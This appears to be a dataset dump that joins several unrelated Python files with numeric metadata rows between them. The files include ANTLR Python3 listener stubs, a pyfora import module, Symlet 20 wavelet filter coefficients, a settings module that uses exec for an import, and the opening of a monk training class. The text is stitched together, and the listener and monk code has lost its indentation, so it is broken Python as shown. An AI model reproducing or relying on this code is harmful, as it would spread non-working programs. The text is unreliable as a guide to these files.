# Enter a parse tree produced by Python3Parser#del_stmt.
def enterDel_stmt(self, ctx: Python3Parser.Del_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#del_stmt.
def exitDel_stmt(self, ctx: Python3Parser.Del_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#pass_stmt.
def enterPass_stmt(self, ctx: Python3Parser.Pass_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#pass_stmt.
def exitPass_stmt(self, ctx: Python3Parser.Pass_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#flow_stmt.
def enterFlow_stmt(self, ctx: Python3Parser.Flow_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#flow_stmt.
def exitFlow_stmt(self, ctx: Python3Parser.Flow_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#break_stmt.
def enterBreak_stmt(self, ctx: Python3Parser.Break_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#break_stmt.
def exitBreak_stmt(self, ctx: Python3Parser.Break_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#continue_stmt.
def enterContinue_stmt(self, ctx: Python3Parser.Continue_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#continue_stmt.
def exitContinue_stmt(self, ctx: Python3Parser.Continue_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#return_stmt.
def enterReturn_stmt(self, ctx: Python3Parser.Return_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#return_stmt.
def exitReturn_stmt(self, ctx: Python3Parser.Return_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#yield_stmt.
def enterYield_stmt(self, ctx: Python3Parser.Yield_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#yield_stmt.
def exitYield_stmt(self, ctx: Python3Parser.Yield_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#raise_stmt.
def enterRaise_stmt(self, ctx: Python3Parser.Raise_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#raise_stmt.
def exitRaise_stmt(self, ctx: Python3Parser.Raise_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#import_stmt.
def enterImport_stmt(self, ctx: Python3Parser.Import_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#import_stmt.
def exitImport_stmt(self, ctx: Python3Parser.Import_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#import_name.
def enterImport_name(self, ctx: Python3Parser.Import_nameContext):
pass
# Exit a parse tree produced by Python3Parser#import_name.
def exitImport_name(self, ctx: Python3Parser.Import_nameContext):
pass
# Enter a parse tree produced by Python3Parser#import_from.
def enterImport_from(self, ctx: Python3Parser.Import_fromContext):
pass
# Exit a parse tree produced by Python3Parser#import_from.
def exitImport_from(self, ctx: Python3Parser.Import_fromContext):
pass
# Enter a parse tree produced by Python3Parser#import_as_name.
def enterImport_as_name(self, ctx: Python3Parser.Import_as_nameContext):
pass
# Exit a parse tree produced by Python3Parser#import_as_name.
def exitImport_as_name(self, ctx: Python3Parser.Import_as_nameContext):
pass
# Enter a parse tree produced by Python3Parser#dotted_as_name.
def enterDotted_as_name(self, ctx: Python3Parser.Dotted_as_nameContext):
pass
# Exit a parse tree produced by Python3Parser#dotted_as_name.
def exitDotted_as_name(self, ctx: Python3Parser.Dotted_as_nameContext):
pass
# Enter a parse tree produced by Python3Parser#import_as_names.
def enterImport_as_names(self, ctx: Python3Parser.Import_as_namesContext):
pass
# Exit a parse tree produced by Python3Parser#import_as_names.
def exitImport_as_names(self, ctx: Python3Parser.Import_as_namesContext):
pass
# Enter a parse tree produced by Python3Parser#dotted_as_names.
def enterDotted_as_names(self, ctx: Python3Parser.Dotted_as_namesContext):
pass
# Exit a parse tree produced by Python3Parser#dotted_as_names.
def exitDotted_as_names(self, ctx: Python3Parser.Dotted_as_namesContext):
pass
# Enter a parse tree produced by Python3Parser#dotted_name.
def enterDotted_name(self, ctx: Python3Parser.Dotted_nameContext):
pass
# Exit a parse tree produced by Python3Parser#dotted_name.
def exitDotted_name(self, ctx: Python3Parser.Dotted_nameContext):
pass
# Enter a parse tree produced by Python3Parser#global_stmt.
def enterGlobal_stmt(self, ctx: Python3Parser.Global_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#global_stmt.
def exitGlobal_stmt(self, ctx: Python3Parser.Global_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#nonlocal_stmt.
def enterNonlocal_stmt(self, ctx: Python3Parser.Nonlocal_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#nonlocal_stmt.
def exitNonlocal_stmt(self, ctx: Python3Parser.Nonlocal_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#assert_stmt.
def enterAssert_stmt(self, ctx: Python3Parser.Assert_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#assert_stmt.
def exitAssert_stmt(self, ctx: Python3Parser.Assert_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#compound_stmt.
def enterCompound_stmt(self, ctx: Python3Parser.Compound_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#compound_stmt.
def exitCompound_stmt(self, ctx: Python3Parser.Compound_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#async_stmt.
def enterAsync_stmt(self, ctx: Python3Parser.Async_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#async_stmt.
def exitAsync_stmt(self, ctx: Python3Parser.Async_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#if_stmt.
def enterIf_stmt(self, ctx: Python3Parser.If_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#if_stmt.
def exitIf_stmt(self, ctx: Python3Parser.If_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#while_stmt.
def enterWhile_stmt(self, ctx: Python3Parser.While_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#while_stmt.
def exitWhile_stmt(self, ctx: Python3Parser.While_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#for_stmt.
def enterFor_stmt(self, ctx: Python3Parser.For_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#for_stmt.
def exitFor_stmt(self, ctx: Python3Parser.For_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#try_stmt.
def enterTry_stmt(self, ctx: Python3Parser.Try_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#try_stmt.
def exitTry_stmt(self, ctx: Python3Parser.Try_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#with_stmt.
def enterWith_stmt(self, ctx: Python3Parser.With_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#with_stmt.
def exitWith_stmt(self, ctx: Python3Parser.With_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#with_item.
def enterWith_item(self, ctx: Python3Parser.With_itemContext):
pass
# Exit a parse tree produced by Python3Parser#with_item.
def exitWith_item(self, ctx: Python3Parser.With_itemContext):
pass
# Enter a parse tree produced by Python3Parser#except_clause.
def enterExcept_clause(self, ctx: Python3Parser.Except_clauseContext):
pass
# Exit a parse tree produced by Python3Parser#except_clause.
def exitExcept_clause(self, ctx: Python3Parser.Except_clauseContext):
pass
# Enter a parse tree produced by Python3Parser#suite.
def enterSuite(self, ctx: Python3Parser.SuiteContext):
pass
# Exit a parse tree produced by Python3Parser#suite.
def exitSuite(self, ctx: Python3Parser.SuiteContext):
pass
# Enter a parse tree produced by Python3Parser#test.
def enterTest(self, ctx: Python3Parser.TestContext):
pass
# Exit a parse tree produced by Python3Parser#test.
def exitTest(self, ctx: Python3Parser.TestContext):
pass
# Enter a parse tree produced by Python3Parser#test_nocond.
def enterTest_nocond(self, ctx: Python3Parser.Test_nocondContext):
pass
# Exit a parse tree produced by Python3Parser#test_nocond.
def exitTest_nocond(self, ctx: Python3Parser.Test_nocondContext):
pass
# Enter a parse tree produced by Python3Parser#lambdef.
def enterLambdef(self, ctx: Python3Parser.LambdefContext):
pass
# Exit a parse tree produced by Python3Parser#lambdef.
def exitLambdef(self, ctx: Python3Parser.LambdefContext):
pass
# Enter a parse tree produced by Python3Parser#lambdef_nocond.
def enterLambdef_nocond(self, ctx: Python3Parser.Lambdef_nocondContext):
pass
# Exit a parse tree produced by Python3Parser#lambdef_nocond.
def exitLambdef_nocond(self, ctx: Python3Parser.Lambdef_nocondContext):
pass
# Enter a parse tree produced by Python3Parser#or_test.
def enterOr_test(self, ctx: Python3Parser.Or_testContext):
pass
# Exit a parse tree produced by Python3Parser#or_test.
def exitOr_test(self, ctx: Python3Parser.Or_testContext):
pass
# Enter a parse tree produced by Python3Parser#and_test.
def enterAnd_test(self, ctx: Python3Parser.And_testContext):
pass
# Exit a parse tree produced by Python3Parser#and_test.
def exitAnd_test(self, ctx: Python3Parser.And_testContext):
pass
# Enter a parse tree produced by Python3Parser#not_test.
def enterNot_test(self, ctx: Python3Parser.Not_testContext):
pass
# Exit a parse tree produced by Python3Parser#not_test.
def exitNot_test(self, ctx: Python3Parser.Not_testContext):
pass
# Enter a parse tree produced by Python3Parser#comparison.
def enterComparison(self, ctx: Python3Parser.ComparisonContext):
pass
# Exit a parse tree produced by Python3Parser#comparison.
def exitComparison(self, ctx: Python3Parser.ComparisonContext):
pass
# Enter a parse tree produced by Python3Parser#comp_op.
def enterComp_op(self, ctx: Python3Parser.Comp_opContext):
pass
# Exit a parse tree produced by Python3Parser#comp_op.
def exitComp_op(self, ctx: Python3Parser.Comp_opContext):
pass
# Enter a parse tree produced by Python3Parser#star_expr.
def enterStar_expr(self, ctx: Python3Parser.Star_exprContext):
pass
# Exit a parse tree produced by Python3Parser#star_expr.
def exitStar_expr(self, ctx: Python3Parser.Star_exprContext):
pass
# Enter a parse tree produced by Python3Parser#expr.
def enterExpr(self, ctx: Python3Parser.ExprContext):
pass
# Exit a parse tree produced by Python3Parser#expr.
def exitExpr(self, ctx: Python3Parser.ExprContext):
pass
# Enter a parse tree produced by Python3Parser#xor_expr.
def enterXor_expr(self, ctx: Python3Parser.Xor_exprContext):
pass
# Exit a parse tree produced by Python3Parser#xor_expr.
def exitXor_expr(self, ctx: Python3Parser.Xor_exprContext):
pass
# Enter a parse tree produced by Python3Parser#and_expr.
def enterAnd_expr(self, ctx: Python3Parser.And_exprContext):
pass
# Exit a parse tree produced by Python3Parser#and_expr.
def exitAnd_expr(self, ctx: Python3Parser.And_exprContext):
pass
# Enter a parse tree produced by Python3Parser#shift_expr.
def enterShift_expr(self, ctx: Python3Parser.Shift_exprContext):
pass
# Exit a parse tree produced by Python3Parser#shift_expr.
def exitShift_expr(self, ctx: Python3Parser.Shift_exprContext):
pass
# Enter a parse tree produced by Python3Parser#arith_expr.
def enterArith_expr(self, ctx: Python3Parser.Arith_exprContext):
pass
# Exit a parse tree produced by Python3Parser#arith_expr.
def exitArith_expr(self, ctx: Python3Parser.Arith_exprContext):
pass
# Enter a parse tree produced by Python3Parser#term.
def enterTerm(self, ctx: Python3Parser.TermContext):
print(ctx.getText())
pass
# Exit a parse tree produced by Python3Parser#term.
def exitTerm(self, ctx: Python3Parser.TermContext):
pass
# Enter a parse tree produced by Python3Parser#factor.
def enterFactor(self, ctx: Python3Parser.FactorContext):
pass
# Exit a parse tree produced by Python3Parser#factor.
def exitFactor(self, ctx: Python3Parser.FactorContext):
pass
# Enter a parse tree produced by Python3Parser#power.
def enterPower(self, ctx: Python3Parser.PowerContext):
print(ctx.getText())
pass
# Exit a parse tree produced by Python3Parser#power.
def exitPower(self, ctx: Python3Parser.PowerContext):
pass
# Enter a parse tree produced by Python3Parser#atom_expr.
def enterAtom_expr(self, ctx: Python3Parser.Atom_exprContext):
pass
# Exit a parse tree produced by Python3Parser#atom_expr.
def exitAtom_expr(self, ctx: Python3Parser.Atom_exprContext):
pass
# Enter a parse tree produced by Python3Parser#atom.
def enterAtom(self, ctx: Python3Parser.AtomContext):
pass
# Exit a parse tree produced by Python3Parser#atom.
def exitAtom(self, ctx: Python3Parser.AtomContext):
pass
# Enter a parse tree produced by Python3Parser#testlist_comp.
def enterTestlist_comp(self, ctx: Python3Parser.Testlist_compContext):
pass
# Exit a parse tree produced by Python3Parser#testlist_comp.
def exitTestlist_comp(self, ctx: Python3Parser.Testlist_compContext):
pass
# Enter a parse tree produced by Python3Parser#trailer.
def enterTrailer(self, ctx: Python3Parser.TrailerContext):
pass
# Exit a parse tree produced by Python3Parser#trailer.
def exitTrailer(self, ctx: Python3Parser.TrailerContext):
pass
# Enter a parse tree produced by Python3Parser#subscriptlist.
def enterSubscriptlist(self, ctx: Python3Parser.SubscriptlistContext):
pass
# Exit a parse tree produced by Python3Parser#subscriptlist.
def exitSubscriptlist(self, ctx: Python3Parser.SubscriptlistContext):
pass
# Enter a parse tree produced by Python3Parser#subscript.
def enterSubscript(self, ctx: Python3Parser.SubscriptContext):
pass
# Exit a parse tree produced by Python3Parser#subscript.
def exitSubscript(self, ctx: Python3Parser.SubscriptContext):
pass
# Enter a parse tree produced by Python3Parser#sliceop.
def enterSliceop(self, ctx: Python3Parser.SliceopContext):
pass
# Exit a parse tree produced by Python3Parser#sliceop.
def exitSliceop(self, ctx: Python3Parser.SliceopContext):
pass
# Enter a parse tree produced by Python3Parser#exprlist.
def enterExprlist(self, ctx: Python3Parser.ExprlistContext):
pass
# Exit a parse tree produced by Python3Parser#exprlist.
def exitExprlist(self, ctx: Python3Parser.ExprlistContext):
pass
# Enter a parse tree produced by Python3Parser#testlist.
def enterTestlist(self, ctx: Python3Parser.TestlistContext):
pass
# Exit a parse tree produced by Python3Parser#testlist.
def exitTestlist(self, ctx: Python3Parser.TestlistContext):
pass
# Enter a parse tree produced by Python3Parser#dictorsetmaker.
def enterDictorsetmaker(self, ctx: Python3Parser.DictorsetmakerContext):
pass
# Exit a parse tree produced by Python3Parser#dictorsetmaker.
def exitDictorsetmaker(self, ctx: Python3Parser.DictorsetmakerContext):
pass
# Enter a parse tree produced by Python3Parser#classdef.
def enterClassdef(self, ctx: Python3Parser.ClassdefContext):
pass
# Exit a parse tree produced by Python3Parser#classdef.
def exitClassdef(self, ctx: Python3Parser.ClassdefContext):
pass
# Enter a parse tree produced by Python3Parser#arglist.
def enterArglist(self, ctx: Python3Parser.ArglistContext):
pass
# Exit a parse tree produced by Python3Parser#arglist.
def exitArglist(self, ctx: Python3Parser.ArglistContext):
pass
# Enter a parse tree produced by Python3Parser#argument.
def enterArgument(self, ctx: Python3Parser.ArgumentContext):
pass
# Exit a parse tree produced by Python3Parser#argument.
def exitArgument(self, ctx: Python3Parser.ArgumentContext):
pass
# Enter a parse tree produced by Python3Parser#comp_iter.
def enterComp_iter(self, ctx: Python3Parser.Comp_iterContext):
pass
# Exit a parse tree produced by Python3Parser#comp_iter.
def exitComp_iter(self, ctx: Python3Parser.Comp_iterContext):
pass
# Enter a parse tree produced by Python3Parser#comp_for.
def enterComp_for(self, ctx: Python3Parser.Comp_forContext):
pass
# Exit a parse tree produced by Python3Parser#comp_for.
def exitComp_for(self, ctx: Python3Parser.Comp_forContext):
pass
# Enter a parse tree produced by Python3Parser#comp_if.
def enterComp_if(self, ctx: Python3Parser.Comp_ifContext):
pass
# Exit a parse tree produced by Python3Parser#comp_if.
def exitComp_if(self, ctx: Python3Parser.Comp_ifContext):
pass
# Enter a parse tree produced by Python3Parser#encoding_decl.
def enterEncoding_decl(self, ctx: Python3Parser.Encoding_declContext):
pass
# Exit a parse tree produced by Python3Parser#encoding_decl.
def exitEncoding_decl(self, ctx: Python3Parser.Encoding_declContext):
pass
# Enter a parse tree produced by Python3Parser#yield_expr.
def enterYield_expr(self, ctx: Python3Parser.Yield_exprContext):
pass
# Exit a parse tree produced by Python3Parser#yield_expr.
def exitYield_expr(self, ctx: Python3Parser.Yield_exprContext):
pass
# Enter a parse tree produced by Python3Parser#yield_arg.
def enterYield_arg(self, ctx: Python3Parser.Yield_argContext):
pass
# Exit a parse tree produced by Python3Parser#yield_arg.
def exitYield_arg(self, ctx: Python3Parser.Yield_argContext):
pass
| 30.447641 | 84 | 0.68608 | 2,962 | 26,459 | 6.00709 | 0.092167 | 0.058 | 0.096667 | 0.174001 | 0.882707 | 0.7739 | 0.7739 | 0.599056 | 0.466082 | 0.080256 | 0 | 0.017802 | 0.254809 | 26,459 | 868 | 85 | 30.482719 | 0.884617 | 0.357421 | 0 | 0.497143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 1 | 0.491429 | false | 0.497143 | 0.037143 | 0 | 0.531429 | 0.005714 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
90abdc11cd1fdb87fa3607871191c33f42074e0b | 470 | py | Python | packages/python/pyfora/algorithms/__init__.py | ufora/ufora | 04db96ab049b8499d6d6526445f4f9857f1b6c7e | [
"Apache-2.0",
"CC0-1.0",
"MIT",
"BSL-1.0",
"BSD-3-Clause"
] | 571 | 2015-11-05T20:07:07.000Z | 2022-01-24T22:31:09.000Z | packages/python/pyfora/algorithms/__init__.py | timgates42/ufora | 04db96ab049b8499d6d6526445f4f9857f1b6c7e | [
"Apache-2.0",
"CC0-1.0",
"MIT",
"BSL-1.0",
"BSD-3-Clause"
] | 218 | 2015-11-05T20:37:55.000Z | 2021-05-30T03:53:50.000Z | packages/python/pyfora/algorithms/__init__.py | timgates42/ufora | 04db96ab049b8499d6d6526445f4f9857f1b6c7e | [
"Apache-2.0",
"CC0-1.0",
"MIT",
"BSL-1.0",
"BSD-3-Clause"
] | 40 | 2015-11-07T21:42:19.000Z | 2021-05-23T03:48:19.000Z | from pyfora.algorithms.LinearRegression import linearRegression
from pyfora.algorithms.logistic.BinaryLogisticRegressionFitter import BinaryLogisticRegressionFitter
from pyfora.algorithms.regressionTrees.RegressionTree import RegressionTreeBuilder
from pyfora.algorithms.regressionTrees.GradientBoostedClassifierBuilder import GradientBoostedClassifierBuilder
from pyfora.algorithms.regressionTrees.GradientBoostedRegressorBuilder import GradientBoostedRegressorBuilder
| 78.333333 | 111 | 0.92766 | 34 | 470 | 12.823529 | 0.352941 | 0.114679 | 0.229358 | 0.240826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 470 | 5 | 112 | 94 | 0.968889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
90b67dfebc1a2abd716b7dab9d127083411361a6 | 5,571 | py | Python | torpido/wavelet/wavelets/sym20.py | AP-Atul/Torpido | a646b4d6de7f2e2c96de4c64ce3113f53e3931c2 | [
"Unlicense"
] | 21 | 2020-12-23T07:13:10.000Z | 2022-01-12T10:32:22.000Z | wavelet/wavelets/sym20.py | AP-Atul/wavelets-ext | 00ced22462c369584ebd32f9b5f357f092de0142 | [
"MIT"
] | 2 | 2020-12-30T10:45:42.000Z | 2021-09-25T09:52:00.000Z | wavelet/wavelets/sym20.py | AP-Atul/wavelets-ext | 00ced22462c369584ebd32f9b5f357f092de0142 | [
"MIT"
] | 1 | 2021-02-06T21:39:41.000Z | 2021-02-06T21:39:41.000Z | """ Symlet 20 wavelet """
class Symlet20:
"""
Properties
----------
near symmetric, orthogonal, biorthogonal
All values are from http://wavelets.pybytes.com/wavelet/sym20/
"""
__name__ = "Symlet Wavelet 20"
__motherWaveletLength__ = 40 # length of the mother wavelet
__transformWaveletLength__ = 2 # minimum wavelength of input signal
# decomposition filter
# low-pass
decompositionLowFilter = [
3.695537474835221e-07,
-1.9015675890554106e-07,
-7.919361411976999e-06,
3.025666062736966e-06,
7.992967835772481e-05,
-1.928412300645204e-05,
-0.0004947310915672655,
7.215991188074035e-05,
0.002088994708190198,
-0.0003052628317957281,
-0.006606585799088861,
0.0014230873594621453,
0.01700404902339034,
-0.003313857383623359,
-0.031629437144957966,
0.008123228356009682,
0.025579349509413946,
-0.07899434492839816,
-0.02981936888033373,
0.4058314443484506,
0.75116272842273,
0.47199147510148703,
-0.0510883429210674,
-0.16057829841525254,
0.03625095165393308,
0.08891966802819956,
-0.0068437019650692274,
-0.035373336756604236,
0.0019385970672402002,
0.012157040948785737,
-0.0006111263857992088,
-0.0034716478028440734,
0.0001254409172306726,
0.0007476108597820572,
-2.6615550335516086e-05,
-0.00011739133516291466,
4.525422209151636e-06,
1.22872527779612e-05,
-3.2567026420174407e-07,
-6.329129044776395e-07,
]
# high-pass
decompositionHighFilter = [
6.329129044776395e-07,
-3.2567026420174407e-07,
-1.22872527779612e-05,
4.525422209151636e-06,
0.00011739133516291466,
-2.6615550335516086e-05,
-0.0007476108597820572,
0.0001254409172306726,
0.0034716478028440734,
-0.0006111263857992088,
-0.012157040948785737,
0.0019385970672402002,
0.035373336756604236,
-0.0068437019650692274,
-0.08891966802819956,
0.03625095165393308,
0.16057829841525254,
-0.0510883429210674,
-0.47199147510148703,
0.75116272842273,
-0.4058314443484506,
-0.02981936888033373,
0.07899434492839816,
0.025579349509413946,
-0.008123228356009682,
-0.031629437144957966,
0.003313857383623359,
0.01700404902339034,
-0.0014230873594621453,
-0.006606585799088861,
0.0003052628317957281,
0.002088994708190198,
-7.215991188074035e-05,
-0.0004947310915672655,
1.928412300645204e-05,
7.992967835772481e-05,
-3.025666062736966e-06,
-7.919361411976999e-06,
1.9015675890554106e-07,
3.695537474835221e-07,
]
# reconstruction filters
# low pass
reconstructionLowFilter = [
-6.329129044776395e-07,
-3.2567026420174407e-07,
1.22872527779612e-05,
4.525422209151636e-06,
-0.00011739133516291466,
-2.6615550335516086e-05,
0.0007476108597820572,
0.0001254409172306726,
-0.0034716478028440734,
-0.0006111263857992088,
0.012157040948785737,
0.0019385970672402002,
-0.035373336756604236,
-0.0068437019650692274,
0.08891966802819956,
0.03625095165393308,
-0.16057829841525254,
-0.0510883429210674,
0.47199147510148703,
0.75116272842273,
0.4058314443484506,
-0.02981936888033373,
-0.07899434492839816,
0.025579349509413946,
0.008123228356009682,
-0.031629437144957966,
-0.003313857383623359,
0.01700404902339034,
0.0014230873594621453,
-0.006606585799088861,
-0.0003052628317957281,
0.002088994708190198,
7.215991188074035e-05,
-0.0004947310915672655,
-1.928412300645204e-05,
7.992967835772481e-05,
3.025666062736966e-06,
-7.919361411976999e-06,
-1.9015675890554106e-07,
3.695537474835221e-07,
]
# high-pass
reconstructionHighFilter = [
3.695537474835221e-07,
1.9015675890554106e-07,
-7.919361411976999e-06,
-3.025666062736966e-06,
7.992967835772481e-05,
1.928412300645204e-05,
-0.0004947310915672655,
-7.215991188074035e-05,
0.002088994708190198,
0.0003052628317957281,
-0.006606585799088861,
-0.0014230873594621453,
0.01700404902339034,
0.003313857383623359,
-0.031629437144957966,
-0.008123228356009682,
0.025579349509413946,
0.07899434492839816,
-0.02981936888033373,
-0.4058314443484506,
0.75116272842273,
-0.47199147510148703,
-0.0510883429210674,
0.16057829841525254,
0.03625095165393308,
-0.08891966802819956,
-0.0068437019650692274,
0.035373336756604236,
0.0019385970672402002,
-0.012157040948785737,
-0.0006111263857992088,
0.0034716478028440734,
0.0001254409172306726,
-0.0007476108597820572,
-2.6615550335516086e-05,
0.00011739133516291466,
4.525422209151636e-06,
-1.22872527779612e-05,
-3.2567026420174407e-07,
6.329129044776395e-07,
]
| 28.865285 | 72 | 0.61856 | 422 | 5,571 | 8.137441 | 0.218009 | 0.008736 | 0.022132 | 0.023296 | 0.882935 | 0.882935 | 0.882935 | 0.882935 | 0.882935 | 0.882935 | 0 | 0.757269 | 0.290074 | 5,571 | 192 | 73 | 29.015625 | 0.110999 | 0.052594 | 0 | 0.930233 | 0 | 0 | 0.003246 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.046512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
294d600035c0b7e0a403c89fced01ecf61aa007a | 40 | py | Python | exampleproject/tests/test_non_utf_crash.py | pjdelport/pytest-testmon | dbbaf2f29cc7e9a2745f27dae91e44ce973e8d10 | [
"MIT"
] | null | null | null | exampleproject/tests/test_non_utf_crash.py | pjdelport/pytest-testmon | dbbaf2f29cc7e9a2745f27dae91e44ce973e8d10 | [
"MIT"
] | null | null | null | exampleproject/tests/test_non_utf_crash.py | pjdelport/pytest-testmon | dbbaf2f29cc7e9a2745f27dae91e44ce973e8d10 | [
"MIT"
] | null | null | null | def test_basic():
import print1250r
| 13.333333 | 21 | 0.725 | 5 | 40 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0.2 | 40 | 2 | 22 | 20 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0.5 | 0 | 1 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
2959e4d34d8c4e6f04454c48f10372abc485be57 | 81 | py | Python | jp.atcoder/arc025/arc025_1/30797423.py | kagemeka/atcoder-submissions | 91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e | [
"MIT"
] | 1 | 2022-02-09T03:06:25.000Z | 2022-02-09T03:06:25.000Z | jp.atcoder/arc025/arc025_1/30797423.py | kagemeka/atcoder-submissions | 91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e | [
"MIT"
] | 1 | 2022-02-05T22:53:18.000Z | 2022-02-09T01:29:30.000Z | jp.atcoder/arc025/arc025_1/30797423.py | kagemeka/atcoder-submissions | 91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e | [
"MIT"
] | null | null | null | print(sum(map(max, zip(map(int, input().split()), map(int, input().split())))))
| 40.5 | 80 | 0.604938 | 13 | 81 | 3.769231 | 0.615385 | 0.244898 | 0.44898 | 0.653061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 81 | 1 | 81 | 81 | 0.653333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
462f199e4a0175111862d8348ab0d24d8cf498f1 | 85 | py | Python | ausgsteckt/ausgsteckt/settings/__init__.py | kelvan/ausgsteckt | 8a1063ff065cdb167648e75f1cdbdc6fce897992 | [
"MIT"
] | 2 | 2018-01-30T15:59:21.000Z | 2018-07-25T04:56:40.000Z | ausgsteckt/ausgsteckt/settings/__init__.py | kelvan/ausgsteckt | 8a1063ff065cdb167648e75f1cdbdc6fce897992 | [
"MIT"
] | null | null | null | ausgsteckt/ausgsteckt/settings/__init__.py | kelvan/ausgsteckt | 8a1063ff065cdb167648e75f1cdbdc6fce897992 | [
"MIT"
] | null | null | null | from ._servers import get_server_type
exec("from .%s import *" % get_server_type())
| 21.25 | 45 | 0.741176 | 13 | 85 | 4.461538 | 0.615385 | 0.310345 | 0.517241 | 0.655172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129412 | 85 | 3 | 46 | 28.333333 | 0.783784 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
3114da02a1f3d2d2a4552d7a96cd384ecc849d89 | 34,843 | py | Python | monk/pytorch/finetune/level_3_training_base.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 542 | 2019-11-10T12:09:31.000Z | 2022-03-28T11:39:07.000Z | monk/pytorch/finetune/level_3_training_base.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 117 | 2019-11-12T09:39:24.000Z | 2022-03-12T00:20:41.000Z | monk/pytorch/finetune/level_3_training_base.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 246 | 2019-11-09T21:53:24.000Z | 2022-03-29T00:57:07.000Z | from monk.pytorch.finetune.imports import *
from monk.system.imports import *
from monk.pytorch.finetune.level_2_model_base import finetune_model
class finetune_training(finetune_model):
'''
Base class for training and associated functions
Args:
verbose (int): Set verbosity levels
0 - Print Nothing
1 - Print desired details
'''
